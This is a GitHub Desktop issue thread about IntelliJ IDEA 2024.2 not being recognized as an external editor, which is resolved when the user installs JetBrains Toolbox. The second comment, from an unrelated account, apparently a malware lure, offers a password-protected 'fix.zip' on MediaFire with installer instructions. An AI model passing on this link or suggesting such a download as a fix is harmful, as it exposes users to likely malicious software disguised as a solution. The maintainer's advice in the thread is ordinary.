### ISSUE TITLE
GitHub Desktop does not recognize Intellij Idea

### ISSUE THREAD

**Issue by yujin-chen** [desktop/desktop#19171]
### The problem

I have Intellij IDEA 2024.2.0.2 that download directly from their official website but GitHub Desktop does not recognize it as external editor.

### Release version

Version 3.4.3 (x64)

### Operating system

windows 11

### Screenshots

![image](https://github.com/user-attachments/assets/37f10d58-e455-43dd-a4ea-bb4283fbed70)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by steveward** [comment]
@yujin-chen thanks for the issue. Have you restarted GitHub Desktop since installing IntelliJ? That needs to be done in order for the app to pick up the new editor.

**Comment by yujin-chen** [comment]
@steveward Yes, I have restarted github desktop after installed intelliJ 2024 version.  Still did not pick up the new editor.

**Comment by yujin-chen** [comment]
I redownloaded intelliJ 2023.2.2 and it picked it up. Then I delete intelliJ 2023.2.2 and download intelliJ 2024.2.0.2 again the github desktop does not pick up. I did restart github desktop.

**Comment by yujin-chen** [comment]
Someone suggested download jetbrain toolbox. So I tried and github desktop picks it up. Thanks for helping.

**Comment by steveward** [comment]
Glad to hear things are working now.
